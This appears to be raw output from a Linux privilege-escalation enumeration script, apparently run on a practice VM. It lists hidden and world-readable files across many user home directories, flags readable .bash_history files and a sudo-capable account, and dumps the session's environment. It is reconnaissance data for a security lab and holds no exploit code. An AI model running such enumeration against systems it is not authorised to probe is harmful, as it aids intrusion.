-rw-r--r-- 1 root root 21 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/selinux/mdp/.gitignore
-rw-r--r-- 1 root root 42 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/genksyms/.gitignore
-rw-r--r-- 1 root root 13 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/basic/.gitignore
-rw-r--r-- 1 root root 154 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/.gitignore
-rw-r--r-- 1 root root 54 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/dtc/.gitignore
-rw-r--r-- 1 root root 292 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
-rw-r--r-- 1 root root 402 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
-rw-r--r-- 1 root root 320 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
-rw-r--r-- 1 root root 315 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
-rw-r--r-- 1 root root 340 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
-rw-r--r-- 1 root root 3262 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/tools/.relocs_common.o.cmd
-rw-r--r-- 1 root root 146 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/tools/.relocs.cmd
-rw-r--r-- 1 root root 3282 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/tools/.relocs_32.o.cmd
-rw-r--r-- 1 root root 3282 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/tools/.relocs_64.o.cmd
-rw-r--r-- 1 root root 53316 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 110 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 4815 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/kconfig/.zconf.tab.o.cmd
-rw-r--r-- 1 root root 3671 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 3291 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 4510 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.modpost.o.cmd
-rw-r--r-- 1 root root 2469 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.mk_elfconfig.cmd
-rw-r--r-- 1 root root 5082 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.devicetable-offsets.s.cmd
-rw-r--r-- 1 root root 2133 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.empty.o.cmd
-rw-r--r-- 1 root root 104 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.elfconfig.h.cmd
-rw-r--r-- 1 root root 546 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.devicetable-offsets.h.cmd
-rw-r--r-- 1 root root 129 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.modpost.cmd
-rw-r--r-- 1 root root 3391 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.file2alias.o.cmd
-rw-r--r-- 1 root root 4325 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/mod/.sumversion.o.cmd
-rw-r--r-- 1 root root 3165 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 2769 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 2318 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.kallsyms.cmd
-rw-r--r-- 1 root root 2419 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/genksyms/.parse.tab.o.cmd
-rw-r--r-- 1 root root 2649 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/genksyms/.genksyms.o.cmd
-rw-r--r-- 1 root root 153 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/genksyms/.genksyms.cmd
-rw-r--r-- 1 root root 3263 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/genksyms/.lex.lex.o.cmd
-rw-r--r-- 1 root root 3167 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.asn1_compiler.cmd
-rw-r--r-- 1 root root 1169 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/basic/.bin2c.cmd
-rw-r--r-- 1 root root 4148 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/basic/.fixdep.cmd
-rw-r--r-- 1 root root 2329 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.conmakehash.cmd
-rw-r--r-- 1 root root 3860 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.insert-sys-cert.cmd
-rw-r--r-- 1 root root 4439 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.extract-cert.cmd
-rw-r--r-- 1 root root 3472 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.sortextable.cmd
-rw-r--r-- 1 root root 5057 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/scripts/.sign-file.cmd
-rw-r--r-- 1 root root 14232 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/kernel/.bounds.s.cmd
-rw-r--r-- 1 root root 192895 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/.config
-rw-r--r-- 1 root root 770 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/.missing-syscalls.d
-rw-r--r-- 1 root root 193019 May 13  2016 /usr/src/linux-headers-4.4.0-22-generic/.config.old
-rw-r--r-- 1 root root 12 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/gdb/linux/.gitignore
-rw-r--r-- 1 root root 167 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/kconfig/.gitignore
-rw-r--r-- 1 root root 31 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/kconfig/lxdialog/.gitignore
-rw-r--r-- 1 root root 55 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/mod/.gitignore
-rw-r--r-- 1 root root 11 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/selinux/genheaders/.gitignore
-rw-r--r-- 1 root root 21 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/selinux/mdp/.gitignore
-rw-r--r-- 1 root root 42 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/genksyms/.gitignore
-rw-r--r-- 1 root root 13 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/basic/.gitignore
-rw-r--r-- 1 root root 154 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/.gitignore
-rw-r--r-- 1 root root 54 Jan 10  2016 /usr/src/linux-headers-4.4.0-21/scripts/dtc/.gitignore
-rw-r--r-- 1 MFrei MFrei 3771 Sep  1  2015 /home/MFrei/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/MFrei/.bash_history
-rw-r--r-- 1 MFrei MFrei 220 Sep  1  2015 /home/MFrei/.bash_logout
-rw-r--r-- 1 MFrei MFrei 675 Sep  1  2015 /home/MFrei/.profile
-rw-r--r-- 1 Sam Sam 3771 Sep  1  2015 /home/Sam/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/Sam/.bash_history
-rw-r--r-- 1 Sam Sam 220 Sep  1  2015 /home/Sam/.bash_logout
-rw-r--r-- 1 Sam Sam 675 Sep  1  2015 /home/Sam/.profile
-rw-r--r-- 1 CCeaser CCeaser 3771 Sep  1  2015 /home/CCeaser/.bashrc
-rw-r--r-- 1 root root 10 Jun  5  2016 /home/CCeaser/.bash_history
-rw-r--r-- 1 CCeaser CCeaser 220 Sep  1  2015 /home/CCeaser/.bash_logout
-rw-r--r-- 1 CCeaser CCeaser 675 Sep  1  2015 /home/CCeaser/.profile
-rw-r--r-- 1 www www 3771 Sep  1  2015 /home/www/.bashrc
-rw-r--r-- 1 www www 220 Sep  1  2015 /home/www/.bash_logout
-rw-r--r-- 1 www www 675 Sep  1  2015 /home/www/.profile
-rw-r--r-- 1 DSwanger DSwanger 3771 Sep  1  2015 /home/DSwanger/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/DSwanger/.bash_history
-rw-r--r-- 1 DSwanger DSwanger 220 Sep  1  2015 /home/DSwanger/.bash_logout
-rw-r--r-- 1 DSwanger DSwanger 675 Sep  1  2015 /home/DSwanger/.profile
-rw-r--r-- 1 JBare JBare 3771 Sep  1  2015 /home/JBare/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/JBare/.bash_history
-rw-r--r-- 1 JBare JBare 220 Sep  1  2015 /home/JBare/.bash_logout
-rw-r--r-- 1 JBare JBare 675 Sep  1  2015 /home/JBare/.profile
-rw-r--r-- 1 mel mel 3771 Sep  1  2015 /home/mel/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/mel/.bash_history
-rw-r--r-- 1 mel mel 220 Sep  1  2015 /home/mel/.bash_logout
-rw-r--r-- 1 mel mel 675 Sep  1  2015 /home/mel/.profile
-rw-r--r-- 1 jess jess 3771 Sep  1  2015 /home/jess/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/jess/.bash_history
-rw-r--r-- 1 jess jess 220 Sep  1  2015 /home/jess/.bash_logout
-rw-r--r-- 1 jess jess 675 Sep  1  2015 /home/jess/.profile
-rw-r--r-- 1 MBassin MBassin 3771 Sep  1  2015 /home/MBassin/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/MBassin/.bash_history
-rw-r--r-- 1 MBassin MBassin 220 Sep  1  2015 /home/MBassin/.bash_logout
-rw-r--r-- 1 MBassin MBassin 675 Sep  1  2015 /home/MBassin/.profile
-rw-r--r-- 1 kai kai 3771 Sep  1  2015 /home/kai/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/kai/.bash_history
-rw-r--r-- 1 kai kai 220 Sep  1  2015 /home/kai/.bash_logout
-rw-r--r-- 1 kai kai 675 Sep  1  2015 /home/kai/.profile
-rw-r--r-- 1 elly elly 3771 Sep  1  2015 /home/elly/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/elly/.bash_history
-rw-r--r-- 1 elly elly 220 Sep  1  2015 /home/elly/.bash_logout
-rw-r--r-- 1 elly elly 675 Sep  1  2015 /home/elly/.profile
-rw-r--r-- 1 Drew Drew 3771 Sep  1  2015 /home/Drew/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/Drew/.bash_history
-rw-r--r-- 1 Drew Drew 220 Sep  1  2015 /home/Drew/.bash_logout
-rw-r--r-- 1 Drew Drew 675 Sep  1  2015 /home/Drew/.profile
-rw-r--r-- 1 JLipps JLipps 3771 Sep  1  2015 /home/JLipps/.bashrc
-rw-r--r-- 1 root root 10 Jun  5  2016 /home/JLipps/.bash_history
-rw-r--r-- 1 JLipps JLipps 220 Sep  1  2015 /home/JLipps/.bash_logout
-rw-r--r-- 1 JLipps JLipps 675 Sep  1  2015 /home/JLipps/.profile
-rw-r--r-- 1 jamie jamie 3771 Sep  1  2015 /home/jamie/.bashrc
-rw-r--r-- 1 root root 16 Jun  5  2016 /home/jamie/.bash_history
-rw-r--r-- 1 jamie jamie 220 Sep  1  2015 /home/jamie/.bash_logout
-rw-r--r-- 1 jamie jamie 675 Sep  1  2015 /home/jamie/.profile
-rw-r--r-- 1 Taylor Taylor 3771 Sep  1  2015 /home/Taylor/.bashrc
-rw-r--r-- 1 root root 8 Jun  5  2016 /home/Taylor/.bash_history
-rw-r--r-- 1 Taylor Taylor 220 Sep  1  2015 /home/Taylor/.bash_logout
-rw-r--r-- 1 Taylor Taylor 675 Sep  1  2015 /home/Taylor/.profile
-rw------- 1 peter peter 577 Jun  3  2016 /home/peter/.viminfo
-rw-rw-r-- 1 peter peter 39206 Jun  3  2016 /home/peter/.zcompdump
-rw-r--r-- 1 peter peter 3771 Jun  3  2016 /home/peter/.bashrc
-rw------- 1 peter peter 1 Jun  5  2016 /home/peter/.bash_history
-rw-r--r-- 1 peter peter 220 Jun  3  2016 /home/peter/.bash_logout
-rw-r--r-- 1 peter peter 0 Jun  3  2016 /home/peter/.sudo_as_admin_successful
-rw-r--r-- 1 peter peter 675 Jun  3  2016 /home/peter/.profile
-rw-r--r-- 1 SHayslett SHayslett 3771 Sep  1  2015 /home/SHayslett/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/SHayslett/.bash_history
-rw-r--r-- 1 SHayslett SHayslett 220 Sep  1  2015 /home/SHayslett/.bash_logout
-rw-r--r-- 1 SHayslett SHayslett 675 Sep  1  2015 /home/SHayslett/.profile
-rw-r--r-- 1 JKanode JKanode 3771 Sep  1  2015 /home/JKanode/.bashrc
-rw-r--r-- 1 JKanode JKanode 167 Jun  5  2016 /home/JKanode/.bash_history
-rw-r--r-- 1 JKanode JKanode 220 Sep  1  2015 /home/JKanode/.bash_logout
-rw-r--r-- 1 JKanode JKanode 675 Sep  1  2015 /home/JKanode/.profile
-rw-r--r-- 1 AParnell AParnell 3771 Sep  1  2015 /home/AParnell/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/AParnell/.bash_history
-rw-r--r-- 1 AParnell AParnell 220 Sep  1  2015 /home/AParnell/.bash_logout
-rw-r--r-- 1 AParnell AParnell 675 Sep  1  2015 /home/AParnell/.profile
-rw-r--r-- 1 CJoo CJoo 3771 Sep  1  2015 /home/CJoo/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/CJoo/.bash_history
-rw-r--r-- 1 CJoo CJoo 220 Sep  1  2015 /home/CJoo/.bash_logout
-rw-r--r-- 1 CJoo CJoo 675 Sep  1  2015 /home/CJoo/.profile
-rw-r--r-- 1 Eeth Eeth 3771 Sep  1  2015 /home/Eeth/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/Eeth/.bash_history
-rw-r--r-- 1 Eeth Eeth 220 Sep  1  2015 /home/Eeth/.bash_logout
-rw-r--r-- 1 Eeth Eeth 675 Sep  1  2015 /home/Eeth/.profile
-rw-r--r-- 1 RNunemaker RNunemaker 3771 Sep  1  2015 /home/RNunemaker/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/RNunemaker/.bash_history
-rw-r--r-- 1 RNunemaker RNunemaker 220 Sep  1  2015 /home/RNunemaker/.bash_logout
-rw-r--r-- 1 RNunemaker RNunemaker 675 Sep  1  2015 /home/RNunemaker/.profile
-rw-r--r-- 1 SHAY SHAY 3771 Sep  1  2015 /home/SHAY/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/SHAY/.bash_history
-rw-r--r-- 1 SHAY SHAY 220 Sep  1  2015 /home/SHAY/.bash_logout
-rw-r--r-- 1 SHAY SHAY 675 Sep  1  2015 /home/SHAY/.profile
-rw-r--r-- 1 ETollefson ETollefson 3771 Sep  1  2015 /home/ETollefson/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/ETollefson/.bash_history
-rw-r--r-- 1 ETollefson ETollefson 220 Sep  1  2015 /home/ETollefson/.bash_logout
-rw-r--r-- 1 ETollefson ETollefson 675 Sep  1  2015 /home/ETollefson/.profile
-rw-r--r-- 1 IChadwick IChadwick 3771 Sep  1  2015 /home/IChadwick/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/IChadwick/.bash_history
-rw-r--r-- 1 IChadwick IChadwick 220 Sep  1  2015 /home/IChadwick/.bash_logout
-rw-r--r-- 1 IChadwick IChadwick 675 Sep  1  2015 /home/IChadwick/.profile
-rw-r--r-- 1 LSolum2 LSolum2 3771 Sep  1  2015 /home/LSolum2/.bashrc
-rw-r--r-- 1 root root 12 Jun  5  2016 /home/LSolum2/.bash_history
-rw-r--r-- 1 LSolum2 LSolum2 220 Sep  1  2015 /home/LSolum2/.bash_logout
-rw-r--r-- 1 LSolum2 LSolum2 675 Sep  1  2015 /home/LSolum2/.profile
-rw-r--r-- 1 SStroud SStroud 3771 Sep  1  2015 /home/SStroud/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/SStroud/.bash_history
-rw-r--r-- 1 SStroud SStroud 220 Sep  1  2015 /home/SStroud/.bash_logout
-rw-r--r-- 1 SStroud SStroud 675 Sep  1  2015 /home/SStroud/.profile
-rw-r--r-- 1 LSolum LSolum 3771 Sep  1  2015 /home/LSolum/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/LSolum/.bash_history
-rw-r--r-- 1 LSolum LSolum 220 Sep  1  2015 /home/LSolum/.bash_logout
-rw-r--r-- 1 LSolum LSolum 675 Sep  1  2015 /home/LSolum/.profile
-rw-r--r-- 1 NATHAN NATHAN 3771 Sep  1  2015 /home/NATHAN/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/NATHAN/.bash_history
-rw-r--r-- 1 NATHAN NATHAN 220 Sep  1  2015 /home/NATHAN/.bash_logout
-rw-r--r-- 1 NATHAN NATHAN 675 Sep  1  2015 /home/NATHAN/.profile
-rw-r--r-- 1 zoe zoe 3771 Sep  1  2015 /home/zoe/.bashrc
-rw-r--r-- 1 root root 9 Jun  5  2016 /home/zoe/.bash_history
-rw-r--r-- 1 zoe zoe 220 Sep  1  2015 /home/zoe/.bash_logout
-rw-r--r-- 1 zoe zoe 675 Sep  1  2015 /home/zoe/.profile
-rw-r--r-- 1 root root 0 Jul 22 17:31 /run/network/.ifstate.lock


[[-] World-readable files within /home:
-rw-r--r-- 1 MFrei MFrei 3771 Sep  1  2015 /home/MFrei/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/MFrei/.bash_history
-rw-r--r-- 1 MFrei MFrei 220 Sep  1  2015 /home/MFrei/.bash_logout
-rw-r--r-- 1 MFrei MFrei 675 Sep  1  2015 /home/MFrei/.profile
-rw-r--r-- 1 Sam Sam 3771 Sep  1  2015 /home/Sam/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/Sam/.bash_history
-rw-r--r-- 1 Sam Sam 220 Sep  1  2015 /home/Sam/.bash_logout
-rw-r--r-- 1 Sam Sam 675 Sep  1  2015 /home/Sam/.profile
-rw-r--r-- 1 CCeaser CCeaser 3771 Sep  1  2015 /home/CCeaser/.bashrc
-rw-r--r-- 1 root root 10 Jun  5  2016 /home/CCeaser/.bash_history
-rw-r--r-- 1 CCeaser CCeaser 220 Sep  1  2015 /home/CCeaser/.bash_logout
-rw-r--r-- 1 CCeaser CCeaser 675 Sep  1  2015 /home/CCeaser/.profile
-rw-r--r-- 1 www www 3771 Sep  1  2015 /home/www/.bashrc
-rw-r--r-- 1 www www 220 Sep  1  2015 /home/www/.bash_logout
-rw-r--r-- 1 www www 675 Sep  1  2015 /home/www/.profile
-rw-r--r-- 1 DSwanger DSwanger 3771 Sep  1  2015 /home/DSwanger/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/DSwanger/.bash_history
-rw-r--r-- 1 DSwanger DSwanger 220 Sep  1  2015 /home/DSwanger/.bash_logout
-rw-r--r-- 1 DSwanger DSwanger 675 Sep  1  2015 /home/DSwanger/.profile
-rw-r--r-- 1 JBare JBare 3771 Sep  1  2015 /home/JBare/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/JBare/.bash_history
-rw-r--r-- 1 JBare JBare 220 Sep  1  2015 /home/JBare/.bash_logout
-rw-r--r-- 1 JBare JBare 675 Sep  1  2015 /home/JBare/.profile
-rw-r--r-- 1 mel mel 3771 Sep  1  2015 /home/mel/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/mel/.bash_history
-rw-r--r-- 1 mel mel 220 Sep  1  2015 /home/mel/.bash_logout
-rw-r--r-- 1 mel mel 675 Sep  1  2015 /home/mel/.profile
-rw-r--r-- 1 jess jess 3771 Sep  1  2015 /home/jess/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/jess/.bash_history
-rw-r--r-- 1 jess jess 220 Sep  1  2015 /home/jess/.bash_logout
-rw-r--r-- 1 jess jess 675 Sep  1  2015 /home/jess/.profile
-rw-r--r-- 1 MBassin MBassin 3771 Sep  1  2015 /home/MBassin/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/MBassin/.bash_history
-rw-r--r-- 1 MBassin MBassin 220 Sep  1  2015 /home/MBassin/.bash_logout
-rw-r--r-- 1 MBassin MBassin 675 Sep  1  2015 /home/MBassin/.profile
-rw-r--r-- 1 kai kai 3771 Sep  1  2015 /home/kai/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/kai/.bash_history
-rw-r--r-- 1 kai kai 220 Sep  1  2015 /home/kai/.bash_logout
-rw-r--r-- 1 kai kai 675 Sep  1  2015 /home/kai/.profile
-rw-r--r-- 1 elly elly 3771 Sep  1  2015 /home/elly/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/elly/.bash_history
-rw-r--r-- 1 elly elly 220 Sep  1  2015 /home/elly/.bash_logout
-rw-r--r-- 1 elly elly 675 Sep  1  2015 /home/elly/.profile
-rw-r--r-- 1 Drew Drew 3771 Sep  1  2015 /home/Drew/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/Drew/.bash_history
-rw-r--r-- 1 Drew Drew 220 Sep  1  2015 /home/Drew/.bash_logout
-rw-r--r-- 1 Drew Drew 675 Sep  1  2015 /home/Drew/.profile
-rw-r--r-- 1 JLipps JLipps 3771 Sep  1  2015 /home/JLipps/.bashrc
-rw-r--r-- 1 root root 10 Jun  5  2016 /home/JLipps/.bash_history
-rw-r--r-- 1 JLipps JLipps 220 Sep  1  2015 /home/JLipps/.bash_logout
-rw-r--r-- 1 JLipps JLipps 675 Sep  1  2015 /home/JLipps/.profile
-rw-r--r-- 1 jamie jamie 3771 Sep  1  2015 /home/jamie/.bashrc
-rw-r--r-- 1 root root 16 Jun  5  2016 /home/jamie/.bash_history
-rw-r--r-- 1 jamie jamie 220 Sep  1  2015 /home/jamie/.bash_logout
-rw-r--r-- 1 jamie jamie 675 Sep  1  2015 /home/jamie/.profile
-rw-r--r-- 1 Taylor Taylor 3771 Sep  1  2015 /home/Taylor/.bashrc
-rw-r--r-- 1 root root 8 Jun  5  2016 /home/Taylor/.bash_history
-rw-r--r-- 1 Taylor Taylor 220 Sep  1  2015 /home/Taylor/.bash_logout
-rw-r--r-- 1 Taylor Taylor 675 Sep  1  2015 /home/Taylor/.profile
-rw-rw-r-- 1 peter peter 39206 Jun  3  2016 /home/peter/.zcompdump
-rw-r--r-- 1 peter peter 3771 Jun  3  2016 /home/peter/.bashrc
-rw-r--r-- 1 peter peter 220 Jun  3  2016 /home/peter/.bash_logout
-rw-r--r-- 1 peter peter 0 Jun  3  2016 /home/peter/.sudo_as_admin_successful
-rw-r--r-- 1 peter peter 675 Jun  3  2016 /home/peter/.profile
-rw-r--r-- 1 SHayslett SHayslett 3771 Sep  1  2015 /home/SHayslett/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/SHayslett/.bash_history
-rw-r--r-- 1 SHayslett SHayslett 220 Sep  1  2015 /home/SHayslett/.bash_logout
-rw-r--r-- 1 SHayslett SHayslett 675 Sep  1  2015 /home/SHayslett/.profile
-rw-r--r-- 1 JKanode JKanode 3771 Sep  1  2015 /home/JKanode/.bashrc
-rw-r--r-- 1 JKanode JKanode 167 Jun  5  2016 /home/JKanode/.bash_history
-rw-r--r-- 1 JKanode JKanode 220 Sep  1  2015 /home/JKanode/.bash_logout
-rw-r--r-- 1 JKanode JKanode 675 Sep  1  2015 /home/JKanode/.profile
-rw-r--r-- 1 AParnell AParnell 3771 Sep  1  2015 /home/AParnell/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/AParnell/.bash_history
-rw-r--r-- 1 AParnell AParnell 220 Sep  1  2015 /home/AParnell/.bash_logout
-rw-r--r-- 1 AParnell AParnell 675 Sep  1  2015 /home/AParnell/.profile
-rw-r--r-- 1 CJoo CJoo 3771 Sep  1  2015 /home/CJoo/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/CJoo/.bash_history
-rw-r--r-- 1 CJoo CJoo 220 Sep  1  2015 /home/CJoo/.bash_logout
-rw-r--r-- 1 CJoo CJoo 675 Sep  1  2015 /home/CJoo/.profile
-rw-r--r-- 1 Eeth Eeth 3771 Sep  1  2015 /home/Eeth/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/Eeth/.bash_history
-rw-r--r-- 1 Eeth Eeth 220 Sep  1  2015 /home/Eeth/.bash_logout
-rw-r--r-- 1 Eeth Eeth 675 Sep  1  2015 /home/Eeth/.profile
-rw-r--r-- 1 RNunemaker RNunemaker 3771 Sep  1  2015 /home/RNunemaker/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/RNunemaker/.bash_history
-rw-r--r-- 1 RNunemaker RNunemaker 220 Sep  1  2015 /home/RNunemaker/.bash_logout
-rw-r--r-- 1 RNunemaker RNunemaker 675 Sep  1  2015 /home/RNunemaker/.profile
-rw-r--r-- 1 SHAY SHAY 3771 Sep  1  2015 /home/SHAY/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/SHAY/.bash_history
-rw-r--r-- 1 SHAY SHAY 220 Sep  1  2015 /home/SHAY/.bash_logout
-rw-r--r-- 1 SHAY SHAY 675 Sep  1  2015 /home/SHAY/.profile
-rw-r--r-- 1 ETollefson ETollefson 3771 Sep  1  2015 /home/ETollefson/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/ETollefson/.bash_history
-rw-r--r-- 1 ETollefson ETollefson 220 Sep  1  2015 /home/ETollefson/.bash_logout
-rw-r--r-- 1 ETollefson ETollefson 675 Sep  1  2015 /home/ETollefson/.profile
-rw-r--r-- 1 IChadwick IChadwick 3771 Sep  1  2015 /home/IChadwick/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/IChadwick/.bash_history
-rw-r--r-- 1 IChadwick IChadwick 220 Sep  1  2015 /home/IChadwick/.bash_logout
-rw-r--r-- 1 IChadwick IChadwick 675 Sep  1  2015 /home/IChadwick/.profile
-rw-r--r-- 1 LSolum2 LSolum2 3771 Sep  1  2015 /home/LSolum2/.bashrc
-rw-r--r-- 1 root root 12 Jun  5  2016 /home/LSolum2/.bash_history
-rw-r--r-- 1 LSolum2 LSolum2 220 Sep  1  2015 /home/LSolum2/.bash_logout
-rw-r--r-- 1 LSolum2 LSolum2 675 Sep  1  2015 /home/LSolum2/.profile
-rw-r--r-- 1 SStroud SStroud 3771 Sep  1  2015 /home/SStroud/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/SStroud/.bash_history
-rw-r--r-- 1 SStroud SStroud 220 Sep  1  2015 /home/SStroud/.bash_logout
-rw-r--r-- 1 SStroud SStroud 675 Sep  1  2015 /home/SStroud/.profile
-rw-r--r-- 1 LSolum LSolum 3771 Sep  1  2015 /home/LSolum/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/LSolum/.bash_history
-rw-r--r-- 1 LSolum LSolum 220 Sep  1  2015 /home/LSolum/.bash_logout
-rw-r--r-- 1 LSolum LSolum 675 Sep  1  2015 /home/LSolum/.profile
-rw-r--r-- 1 NATHAN NATHAN 3771 Sep  1  2015 /home/NATHAN/.bashrc
-rw-r--r-- 1 root root 5 Jun  5  2016 /home/NATHAN/.bash_history
-rw-r--r-- 1 NATHAN NATHAN 220 Sep  1  2015 /home/NATHAN/.bash_logout
-rw-r--r-- 1 NATHAN NATHAN 675 Sep  1  2015 /home/NATHAN/.profile
-rw-r--r-- 1 zoe zoe 3771 Sep  1  2015 /home/zoe/.bashrc
-rw-r--r-- 1 root root 9 Jun  5  2016 /home/zoe/.bash_history
-rw-r--r-- 1 zoe zoe 0 Jul 22 21:13 /home/zoe/.cache/motd.legal-displayed
-rw-r--r-- 1 zoe zoe 220 Sep  1  2015 /home/zoe/.bash_logout
-rw-r--r-- 1 zoe zoe 675 Sep  1  2015 /home/zoe/.profile


[[-] Home directory contents:
total 28K
drwxr-xr-x  3 zoe  zoe  4.0K Jul 22 21:13 .
drwxr-xr-x 32 root root 4.0K Jun  4  2016 ..
-rw-r--r--  1 root root    9 Jun  5  2016 .bash_history
-rw-r--r--  1 zoe  zoe   220 Sep  1  2015 .bash_logout
-rw-r--r--  1 zoe  zoe  3.7K Sep  1  2015 .bashrc
drwx------  2 zoe  zoe  4.0K Jul 22 21:13 .cache
-rw-r--r--  1 zoe  zoe   675 Sep  1  2015 .profile


### ENVIRONMENTAL #######################################
[[-] Environment information:
XDG_SESSION_ID=80
SHELL=/bin/bash
TERM=xterm-256color
SSH_CLIENT=192.168.1.9 50852 22
SSH_TTY=/dev/pts/0
USER=zoe
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
MAIL=/var/mail/zoe
PWD=/tmp
LANG=en_GB.UTF-8
HOME=/home/zoe
SHLVL=2
LANGUAGE=en_GB:en
LOGNAME=zoe
